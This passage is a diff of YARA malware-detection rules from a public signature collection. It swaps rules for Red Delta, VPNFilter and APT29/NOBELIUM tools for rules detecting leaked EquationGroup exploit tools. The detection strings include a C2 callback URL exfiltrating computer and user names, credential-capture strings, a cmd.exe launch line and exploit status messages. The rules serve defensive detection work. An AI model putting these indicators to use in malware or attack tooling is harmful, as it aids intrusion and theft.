+rule SIGNATURE_BASE_Equationgroup_Toolset_Apr17_Architouch_1_0_0 : FILE
 {
 	meta:
-		description = "Detects Red Delta samples"
+		description = "Detects EquationGroup Tool - April Leak"
 		author = "Florian Roth (Nextron Systems)"
-		id = "acb1024a-64af-51ac-84c8-7fe9a5bd4538"
-		date = "2020-10-14"
+		id = "c5af05b5-9dfa-535f-b9ea-c82ef79bae7e"
+		date = "2017-04-15"
 		modified = "2023-12-05"
-		reference = "https://twitter.com/JAMESWT_MHT/status/1316387482708119556"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_cn_reddelta.yar#L31-L57"
+		reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_eqgrp_apr17.yar#L1538-L1551"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "179265c0b2175bc3d2d581a69e50e9b8b9cc918a6fdc7bcef42fb163c49b077a"
+		logic_hash = "cb6959b7b50e6f2895bab5f3355bef836c9a9774285cfb5fea339ce3d2c67f73"
 		score = 75
 		quality = 85
 		tags = "FILE"
-		hash1 = "260ebbf392498d00d767a5c5ba695e1a124057c1c01fff2ae76db7853fe4255b"
-		hash2 = "9ccb4ed133be5c9c554027347ad8b722f0b4c3f14bfd947edfe75a015bf085e5"
-		hash3 = "b3fd750484fca838813e814db7d6491fea36abe889787fb7cf3fb29d9d9f5429"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "444979a2387530c8fbbc5ddb075b15d6a4717c3435859955f37ebc0f40a4addc"
 
 	strings:
-		$x1 = "\\CLRLoader.exe" wide fullword
-		$x2 = "/callback.php?token=%s&computername=%s&username=%s" ascii fullword
-		$s1 = "DotNetLoader.Program" wide fullword
-		$s2 = "/download.php?api=40" ascii fullword
-		$s3 = "get %d URLDir" ascii fullword
-		$s4 = "Read code failed" ascii fullword
-		$s5 = "OpenFile fail!" wide fullword
-		$s6 = "Writefile success" wide fullword
-		$op1 = { 4c 8d 45 e0 49 8b cc 41 8d 51 c3 e8 34 77 02 00 }
+		$s1 = "[+] Target is %s" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 3000KB and 1 of ( $x* ) or 4 of them
+		( uint16( 0 ) == 0x5a4d and filesize < 300KB and all of them )
 }
-rule SIGNATURE_BASE_APT_CN_MAL_Reddelta_Shellcode_Loader_Oct20_3 : FILE
+rule SIGNATURE_BASE_Equationgroup_Toolset_Apr17_Erraticgopher_1_0_1 : FILE
 {
 	meta:
-		description = "Detects Red Delta samples"
+		description = "Detects EquationGroup Tool - April Leak"
 		author = "Florian Roth (Nextron Systems)"
-		id = "b52836bb-cdef-5416-a8e1-72d0b2298546"
-		date = "2020-10-14"
-		modified = "2022-12-21"
-		reference = "https://twitter.com/JAMESWT_MHT/status/1316387482708119556"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_cn_reddelta.yar#L59-L78"
+		id = "1a3fe877-b9ae-50e4-bb1a-c9dcd4d4a657"
+		date = "2017-04-15"
+		modified = "2023-12-05"
+		reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_eqgrp_apr17.yar#L1553-L1569"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "64402f6265f23abf7d6a711aa888c89386c1a754f12286b0efe5fd5d81f15b01"
+		logic_hash = "6b099bd202a962e64cb4f417eb7e09893b869e950eb0740394d222e8b4b89283"
 		score = 75
 		quality = 85
 		tags = "FILE"
-		hash1 = "740992d40b84b10aa9640214a4a490e989ea7b869cea27dbbdef544bb33b1048"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "3d11fe89ffa14f267391bc539e6808d600e465955ddb854201a1f31a9ded4052"
 
 	strings:
-		$s1 = "Taskschd.dll" ascii fullword
-		$s2 = "AddTaskPlanDllVerson.dll" ascii fullword
-		$s3 = "\\FlashUpdate.exe" ascii
-		$s4 = "D:\\Project\\FBIRedTeam" ascii fullword
-		$s5 = "Error %s:%d, ErrorCode: %x" ascii fullword
+		$x1 = "[-] Error appending shellcode buffer" fullword ascii
+		$x2 = "[-] Shellcode is too big" fullword ascii
+		$x3 = "[+] Exploit Payload Sent!" fullword ascii
+		$x4 = "[+] Bound to Dimsvc, sending exploit request to opnum 29" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 400KB and 4 of them
+		( uint16( 0 ) == 0x5a4d and filesize < 150KB and 1 of them )
 }
-rule SIGNATURE_BASE_MAL_ELF_Vpnfilter_1 : FILE
+rule SIGNATURE_BASE_Equationgroup_Toolset_Apr17_Esteemaudit_2_1_0 : FILE
 {
 	meta:
-		description = "Detects VPNFilter malware"
+		description = "Detects EquationGroup Tool - April Leak"
 		author = "Florian Roth (Nextron Systems)"
-		id = "dc50cb37-a6e7-5eb5-9581-31d7fd005e47"
-		date = "2018-05-24"
+		id = "95594756-1872-5d86-877f-0977bd3c067b"
+		date = "2017-04-15"
 		modified = "2023-12-05"
-		reference = "Internal Research"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_vpnfilter.yar#L11-L31"
+		reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_eqgrp_apr17.yar#L1571-L1585"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "aff7b1f3d4afaf883c2702287ef7d6e13e01e80222ba336978d13deb21a93614"
+		logic_hash = "272d435758c0021bfd84d84c00eb05ece2461a39d092693b61d362365ab098cd"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "f8286e29faa67ec765ae0244862f6b7914fcdde10423f96595cb84ad5cc6b344"
+		hash1 = "61f98b12c52739647326e219a1cf99b5440ca56db3b6177ea9db4e3b853c6ea6"
 
 	strings:
-		$s1 = "Login=" fullword ascii
-		$s2 = "Password=" fullword ascii
-		$s3 = "%s/rep_%u.bin" fullword ascii
-		$s4 = "%s:%uh->%s:%hu" fullword ascii
-		$s5 = "Password required" fullword ascii
-		$s6 = "password=" fullword ascii
-		$s7 = "Authorization: Basic" fullword ascii
-		$s8 = "/tmUnblock.cgi" fullword ascii
+		$x1 = "[+] Connected to target %s:%d" fullword ascii
+		$x2 = "[-] build_exploit_run_x64():" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x457f and filesize < 100KB and all of them
+		( uint16( 0 ) == 0x5a4d and filesize < 200KB and 1 of them )
 }
-rule SIGNATURE_BASE_MAL_ELF_Vpnfilter_2 : FILE
+rule SIGNATURE_BASE_Equationgroup_Toolset_Apr17_Darkpulsar_1_1_0 : FILE
 {
 	meta:
-		description = "Detects VPNFilter malware"
+		description = "Detects EquationGroup Tool - April Leak"
 		author = "Florian Roth (Nextron Systems)"
-		id = "95356303-e8ba-585d-b2fc-af9e10b0b93f"
-		date = "2018-05-24"
+		id = "0f4f77d7-99bc-5c84-84bf-877c4e79c9f0"
+		date = "2017-04-15"
 		modified = "2023-12-05"
-		reference = "Internal Research"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_vpnfilter.yar#L33-L48"
+		reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_eqgrp_apr17.yar#L1587-L1601"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "238ec4575fd8adbfa592e07b601313c71a08be8c776e78469aef8ad02e411798"
+		logic_hash = "da8e1723da9e2d9955a3042bceb313d7d10903bfc078ba090c1c5a57be243b96"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "50ac4fcd3fbc8abcaa766449841b3a0a684b3e217fc40935f1ac22c34c58a9ec"
+		hash1 = "b439ed18262aec387984184e86bfdb31ca501172b1c066398f8c56d128ba855a"
 
 	strings:
-		$s1 = "User-Agent: Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 5.2; Trident/4.0)" fullword ascii
-		$s2 = "passwordPASSWORDpassword" fullword ascii
-		$s3 = "/tmp/client.key" fullword ascii
+		$x1 = "[%s] - Error upgraded DLL architecture does not match target architecture (0x%x)" fullword ascii
+		$x2 = "[%s] - Error building DLL loading shellcode" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x457f and filesize < 1000KB and all of them
+		( uint16( 0 ) == 0x5a4d and filesize < 100KB and all of them )
 }
-rule SIGNATURE_BASE_MAL_ELF_Vpnfilter_3 : FILE
+rule SIGNATURE_BASE_Equationgroup_Toolset_Apr17_Educatedscholar_1_0_0 : FILE
 {
 	meta:
-		description = "Detects VPNFilter malware"
+		description = "Detects EquationGroup Tool - April Leak"
 		author = "Florian Roth (Nextron Systems)"
-		id = "020603bf-fbce-5de1-82b9-5a2dfacfada3"
-		date = "2018-05-24"
+		id = "37ca8de5-435b-5c1a-83b8-5704fa137604"
+		date = "2017-04-15"
 		modified = "2023-12-05"
-		reference = "Internal Research"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_vpnfilter.yar#L50-L78"
+		reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_eqgrp_apr17.yar#L1603-L1617"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "71152b57f2d6040608febf32441e1899fdf2479335c26c1143ea58759e6d9094"
+		logic_hash = "0265ce5dfb5697a0610a6023b75f6e3ef2ef0308f639978a8617337df2e16c77"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "0e0094d9bd396a6594da8e21911a3982cd737b445f591581560d766755097d92"
-		hash2 = "9683b04123d7e9fe4c8c26c69b09c2233f7e1440f828837422ce330040782d17"
-		hash3 = "37e29b0ea7a9b97597385a12f525e13c3a7d02ba4161a6946f2a7d978cc045b4"
-		hash4 = "0649fda8888d701eb2f91e6e0a05a2e2be714f564497c44a3813082ef8ff250b"
-		hash5 = "4b03288e9e44d214426a02327223b5e516b1ea29ce72fa25a2fcef9aa65c4b0b"
-		hash6 = "8a20dc9538d639623878a3d3d18d88da8b635ea52e5e2d0c2cce4a8c5a703db1"
-		hash7 = "776cb9a7a9f5afbaffdd4dbd052c6420030b2c7c3058c1455e0a79df0e6f7a1d"
+		hash1 = "4cce9e39c376f67c16df3bcd69efd9b7472c3b478e2e5ef347e1410f1105c38d"
 
 	strings:
-		$sx1 = "User-Agent: Mozilla/6.1 (compatible; MSIE 9.0; Windows NT 5.3; Trident/5.0)" fullword ascii
-		$sx2 = "Execute by shell[%d]:" fullword ascii
-		$sx3 = "CONFIG.TOR.name:" fullword ascii
-		$s1 = "Executing command:  %s %s..." fullword ascii
-		$s2 = "/proc/%d/cmdline" fullword ascii
-		$a1 = "Mozilla/5.0 Firefox/50.0" fullword ascii
-		$a2 = "Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:52.0) Gecko/20100101 Firefox/52.0" fullword ascii
-		$a3 = "Mozilla/5.0 (Windows NT 6.1; rv:52.0) Gecko/20100101 Firefox/52.0" fullword ascii
+		$x1 = "[+] Shellcode Callback %s:%d" fullword ascii
+		$x2 = "[+] Exploiting Target" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x457f and filesize < 1000KB and ( 1 of ( $sx* ) or 2 of ( $s* ) or 2 of ( $a* ) )
+		( uint16( 0 ) == 0x5a4d and filesize < 150KB and 1 of them )
 }
-rule SIGNATURE_BASE_SUSP_ELF_Tor_Client : FILE
+rule SIGNATURE_BASE_Equationgroup_Toolset_Apr17_Doublepulsar_1_3_1 : FILE
 {
 	meta:
-		description = "Detects VPNFilter malware"
+		description = "Detects EquationGroup Tool - April Leak"
 		author = "Florian Roth (Nextron Systems)"
-		id = "1be6528d-1b60-50da-8125-2ef73b8aeb4f"
-		date = "2018-05-24"
+		id = "99711157-58eb-5ec0-bb9f-bf953cd10125"
+		date = "2017-04-15"
 		modified = "2023-12-05"
-		reference = "Internal Research"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_vpnfilter.yar#L80-L95"
+		reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_eqgrp_apr17.yar#L1619-L1634"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "2b67b32c5b8441c9b38e3bfeefa7f59c2767e29985adcba7d52e858847d37e47"
-		score = 65
+		logic_hash = "1b7ed9dbd4312541bd4d939602f63ce1d909729cce1845b018be6a07a9cb7fe2"
+		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "afd281639e26a717aead65b1886f98d6d6c258736016023b4e59de30b7348719"
+		hash1 = "15ffbb8d382cd2ff7b0bd4c87a7c0bffd1541c2fe86865af445123bc0b770d13"
 
 	strings:
-		$x1 = "We needed to load a secret key from %s, but it was encrypted. Try 'tor --keygen' instead, so you can enter the passphrase." fullword ascii
-		$x2 = "Received a VERSION cell with odd payload length %d; closing connection." fullword ascii
-		$x3 = "Please upgrade! This version of Tor (%s) is %s, according to the directory authorities. Recommended versions are: %s" fullword ascii
+		$x1 = "[+] Ping returned Target architecture: %s - XOR Key: 0x%08X" fullword ascii
+		$x2 = "[.] Sending shellcode to inject DLL" fullword ascii
+		$x3 = "[-] Error setting ShellcodeFile name" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x457f and 1 of them
+		( uint16( 0 ) == 0x5a4d and filesize < 100KB and 1 of them )
 }
-rule SIGNATURE_BASE_APT_APT29_NOBELIUM_JS_Envyscout_May21_1 : FILE
+rule SIGNATURE_BASE_Equationgroup_Toolset_Apr17_Erraticgophertouch_1_0_1 : FILE
 {
 	meta:
-		description = "Detects EnvyScout deobfuscator code as used by NOBELIUM group"
+		description = "Detects EquationGroup Tool - April Leak"
 		author = "Florian Roth (Nextron Systems)"
-		id = "42739aad-a88a-545b-8256-1f727c79c4f8"
-		date = "2021-05-29"
-		modified = "2025-03-21"
-		reference = "https://www.microsoft.com/security/blog/2021/05/28/breaking-down-nobeliums-latest-early-stage-toolset/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_apt29_nobelium_may21.yar#L56-L67"
+		id = "9f03a4b6-69ab-5cef-876c-1e86ef2afe10"
+		date = "2017-04-15"
+		modified = "2023-12-05"
+		reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_eqgrp_apr17.yar#L1636-L1651"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "ad8a7bb5a1d2065e3a573842fb37ee3c63b7695c18840f0c26d32e6ae3d99c6c"
+		logic_hash = "08646f7887daddd8efac875bc7b111df7a52feae0a4b81bfd2d2ae7ef9453b5e"
 		score = 75
 		quality = 85
 		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "729eacf20fe71bd74e57a6b829b45113c5d45003933118b53835779f0b049bad"
 
 	strings:
-		$x1 = "[i].charCodeAt(0) ^ 2);}"
+		$x1 = "[-] Unable to connect to broswer named pipe, target is NOT vulnerable" fullword ascii
+		$x2 = "[-] Unable to bind to Dimsvc RPC syntax, target is NOT vulnerable" fullword ascii
+		$x3 = "[+] Bound to Dimsvc, target IS vulnerable" fullword ascii
 
 	condition:
-		filesize < 5000KB and 1 of them
+		( uint16( 0 ) == 0x5a4d and filesize < 30KB and 1 of them )
 }
-rule SIGNATURE_BASE_APT_APT29_NOBELIUM_JS_Envyscout_May21_2 : FILE
+rule SIGNATURE_BASE_Equationgroup_Toolset_Apr17_Smbtouch_1_1_1 : FILE
 {
 	meta:
-		description = "Detects EnvyScout deobfuscator code as used by NOBELIUM group"
+		description = "Detects EquationGroup Tool - April Leak"
 		author = "Florian Roth (Nextron Systems)"
-		id = "d5cf3365-fe24-533a-a678-b5b6d4d99997"
-		date = "2021-05-29"
-		modified = "2025-03-21"
-		reference = "https://www.microsoft.com/security/blog/2021/05/28/breaking-down-nobeliums-latest-early-stage-toolset/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_apt29_nobelium_may21.yar#L69-L83"
+		id = "225799cf-4d1b-54f8-8b76-b9ee1db80ce7"
+		date = "2017-04-15"
+		modified = "2023-12-05"
+		reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_eqgrp_apr17.yar#L1653-L1666"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "6f5c50b340d628559799897a2ba79add7d126e3ecb2daeb365bc15d64796ccd2"
+		logic_hash = "b5eb9d45dfc47470236923a5b8174bc17733e4333db6f8bbe63c4f4bc913cf26"
 		score = 75
 		quality = 85
 		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "108243f61c53f00f8f1adcf67c387a8833f1a2149f063dd9ef29205c90a3c30a"
 
 	strings:
-		$s1 = "saveAs(blob, " ascii
-		$s2 = ".iso\");" ascii
-		$s3 = "application/x-cd-image" ascii
-		$s4 = ".indexOf(\"Win\")!=-1" ascii
+		$x1 = "[+] Target is vulnerable to %d exploit%s" fullword ascii
 
 	condition:
-		filesize < 5000KB and all of them
+		( uint16( 0 ) == 0x5a4d and filesize < 400KB and all of them )
 }
-rule SIGNATURE_BASE_APT_APT29_NOBELIUM_LNK_NV_Link_May21_2 : FILE
+rule SIGNATURE_BASE_Equationgroup_Toolset_Apr17_Educatedscholartouch_1_0_0 : FILE
 {
 	meta:
-		description = "Detects NV Link as used by NOBELIUM group"
+		description = "Detects EquationGroup Tool - April Leak"
 		author = "Florian Roth (Nextron Systems)"
-		id = "52c2caf9-13df-5614-9c9e-afcd76ec77f9"
-		date = "2021-05-29"
-		modified = "2025-03-21"
-		reference = "https://www.microsoft.com/security/blog/2021/05/28/breaking-down-nobeliums-latest-early-stage-toolset/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_apt29_nobelium_may21.yar#L85-L97"
+		id = "62205374-25a3-5b96-ad0a-a82c9a01a242"
+		date = "2017-04-15"
+		modified = "2023-12-05"
+		reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_eqgrp_apr17.yar#L1668-L1682"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "5eee9df368da3fc98c00a0f8c65a7f3bd5b812342082be58054b272b5bb03455"
+		logic_hash = "4c06fad158db8337ff768ad1553401ec31eee6b0d50333ce91a3a12e79d8981a"
 		score = 75
 		quality = 85
 		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "f4b958a0d3bb52cb34f18ea293d43fa301ceadb4a259d3503db912d0a9a1e4d8"
 
 	strings:
-		$s1 = "RegisterOCX BOOM" ascii wide
-		$s2 = "cmd.exe /c start BOOM.exe" ascii wide
+		$x1 = "[!] A vulnerable target will not respond." fullword ascii
+		$x2 = "[-] Target NOT Vulernable" fullword ascii
 
 	condition:
-		filesize < 5000KB and 1 of them
+		( uint16( 0 ) == 0x5a4d and filesize < 30KB and 1 of them )
 }
-rule SIGNATURE_BASE_APT_APT29_NOBELIUM_LNK_Samples_May21_1 : FILE
+rule SIGNATURE_BASE_Equationgroup_Toolset_Apr17_Esteemaudittouch_2_1_0 : FILE
 {
 	meta:
-		description = "Detects link file characteristics as described in APT29 NOBELIUM report"
+		description = "Detects EquationGroup Tool - April Leak"
 		author = "Florian Roth (Nextron Systems)"
-		id = "c807ab5a-f66a-5622-81b1-6e69b6df8446"
-		date = "2021-05-27"
-		modified = "2025-03-21"
-		reference = "https://www.microsoft.com/security/blog/2021/05/27/new-sophisticated-email-based-attack-from-nobelium/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_apt29_nobelium_may21.yar#L99-L128"
+		id = "bb66245e-1261-50bd-8666-75fc4c52ad84"
+		date = "2017-04-15"
+		modified = "2023-12-05"
+		reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_eqgrp_apr17.yar#L1684-L1698"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "32d76bb1af76f0fc2afb76d9726bc8ec99c4be34c9d46cebab7356d8c68af11c"
-		score = 85
+		logic_hash = "f4e62ec7a68115d5ff155ea94fb2c99b9177e928533338a111e531c694ff7b8f"
+		score = 75
 		quality = 85
 		tags = "FILE"
-		hash1 = "24caf54e7c3fe308444093f7ac64d6d520c8f44ea4251e09e24931bdb72f5548"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "f6b9caf503bb664b22c6d39c87620cc17bdb66cef4ccfa48c31f2a3ae13b4281"
 
 	strings:
-		$a1 = "rundll32.exe" wide
-		$sa1 = "IMGMountingService.dll" wide
-		$sa2 = "MountImgHelper" wide
-		$sb1 = "diassvcs.dll" wide
-		$sb2 = "InitializeComponent" wide
-		$sc1 = "MsDiskMountService.dll" wide
-		$sc2 = "DiskDriveIni" wide
-		$sd1 = "GraphicalComponent.dll" wide
-		$sd2 = "VisualServiceComponent" wide
-		$se1 = "data/mstu.dll,MicrosoftUpdateService" wide
+		$x1 = "[-] Touching the target failed!" fullword ascii
+		$x2 = "[-] OS fingerprint not complete - 0x%08x!" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x004c and filesize < 4KB and $a1 and ( all of ( $sa* ) or all of ( $sb* ) or all of ( $sc* ) or all of ( $sd* ) or all of ( $se* ) )
+		( uint16( 0 ) == 0x5a4d and filesize < 200KB and 1 of them )
 }
-rule SIGNATURE_BASE_APT_APT29_NOBELIUM_Boombox_May21_1 : FILE
+rule SIGNATURE_BASE_Equationgroup_Toolset_Apr17_Rpctouch_2_1_0 : FILE
 {
 	meta:
-		description = "Detects BoomBox malware as described in APT29 NOBELIUM report"
-		author = "Florian Roth"
-		id = "1a14dcf7-81be-5a74-a530-caf6268d1976"
-		date = "2021-05-27"
-		modified = "2025-03-20"
-		reference = "https://www.microsoft.com/security/blog/2021/05/27/new-sophisticated-email-based-attack-from-nobelium/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_apt29_nobelium_may21.yar#L130-L161"
+		description = "Detects EquationGroup Tool - April Leak"
+		author = "Florian Roth (Nextron Systems)"
+		id = "0691768b-ca98-5722-8468-737c4966d54d"
+		date = "2017-04-15"
+		modified = "2023-12-05"
+		reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_eqgrp_apr17.yar#L1700-L1714"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "8199f309478e8ed3f03f75e7574a3e9bce09b4423bd7eb08bb5bff03af2b7c27"
-		logic_hash = "034ea34eb34ea6de0c65b9a7fc9d16f108ef34cd75294b022371ac17789c3830"
-		score = 85
+		logic_hash = "3ea1f30c0a2c91cc9ca2eec8eaab167c83f4f52c2732d03d1e7fb99e63986662"
+		score = 75
 		quality = 85
 		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "7fe4c3cedfc98a3e994ca60579f91b8b88bf5ae8cf669baa0928508642c5a887"
 
 	strings:
-		$a1 = "]::FromBase64String($" ascii wide
-		$xa1 = "123do3y4r378o5t34onf7t3o573tfo73" ascii wide fullword
-		$xa2 = "1233t04p7jn3n4rg" ascii wide fullword
-		$s1 = "\\Release\\BOOM.pdb" ascii
-		$s2 = "/files/upload" ascii
-		$s3 = "/tmp/readme.pdf" ascii fullword
-		$s4 = "/new/{0}" ascii fullword
-		$s5 = "(&(objectClass=user)(objectCategory=person))"
+		$x1 = "[*] Failed to detect OS / Service Pack on %s:%d" fullword ascii
+		$x2 = "[*] SMB String: %s (%s)" fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0x5a4d or 1 of ( $a* ) ) and ( 1 of ( $x* ) or 3 of ( $s* ) )
+		( uint16( 0 ) == 0x5a4d and filesize < 80KB and 1 of them )
 }
-
-rule SIGNATURE_BASE_APT_APT29_NOBELIUM_Boombox_PDF_Masq_May21_1 : FILE
+rule SIGNATURE_BASE_Equationgroup_Toolset_Apr17_Mofconfig_1_0_0 : FILE
 {
 	meta:
-		description = "Detects PDF documents as used by BoomBox as described in APT29 NOBELIUM report"
+		description = "Detects EquationGroup Tool - April Leak"
 		author = "Florian Roth (Nextron Systems)"
-		id = "bdfb9600-edda-5c8c-ab23-14fb71c8e647"
-		date = "2021-05-27"
-		modified = "2025-03-21"
-		reference = "https://www.microsoft.com/security/blog/2021/05/27/new-sophisticated-email-based-attack-from-nobelium/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_apt29_nobelium_may21.yar#L163-L182"
+		id = "d0d32e19-d004-5941-a5b3-0b4306565cf2"
+		date = "2017-04-15"
+		modified = "2023-12-05"
+		reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_eqgrp_apr17.yar#L1716-L1729"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "8f1514648b2b797adfe3f8f5acb577c26707dfe1da942c9634be3d88a180a407"
-		score = 70
-		quality = 35
+		logic_hash = "a922eb01efa52601b72c3d91a26585504fcf706a9ed16a36328f94f5871b0b24"
+		score = 75
+		quality = 85
 		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "c67a24fe2380331a101d27d6e69b82d968ccbae54a89a2629b6c135436d7bdb2"
 
 	strings:
-		$ah1 = { 25 50 44 46 2d 31 2e 33 0a 25 }
-		$af1 = { 0a 25 25 45 4f 46 0a }
-		$fp1 = "endobj" ascii
-		$fp2 = "endstream" ascii
-		$fp3 = { 20 6F 62 6A 0A }
+		$x1 = "[-] Get RemoteMOFTriggerPath error" fullword ascii
 
 	condition:
-		$ah1 at 0 and $af1 at ( filesize -7 ) and filesize < 100KB and not 1 of ( $fp* ) and math.entropy ( 16 , filesize ) > 7
+		( uint16( 0 ) == 0x5a4d and filesize < 50KB and all of them )
 }
-rule SIGNATURE_BASE_APT_APT29_NOBELIUM_Nativezone_Loader_May21_1 : FILE
+rule SIGNATURE_BASE_Equationgroup_Toolset_Apr17_Easypi_Explodingcan : FILE
 {
 	meta:
-		description = "Detects NativeZone loader as described in APT29 NOBELIUM report"
+		description = "Detects EquationGroup Tool - April Leak"
 		author = "Florian Roth (Nextron Systems)"
-		id = "02d9257d-f439-5071-96b0-a973b088e329"
-		date = "2021-05-27"
-		modified = "2025-03-21"
-		reference = "https://www.microsoft.com/security/blog/2021/05/27/new-sophisticated-email-based-attack-from-nobelium/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_apt29_nobelium_may21.yar#L184-L204"
+		id = "53d4ebf1-cce3-5fc8-8304-064b4113c9d7"
+		date = "2017-04-15"
+		modified = "2023-12-05"
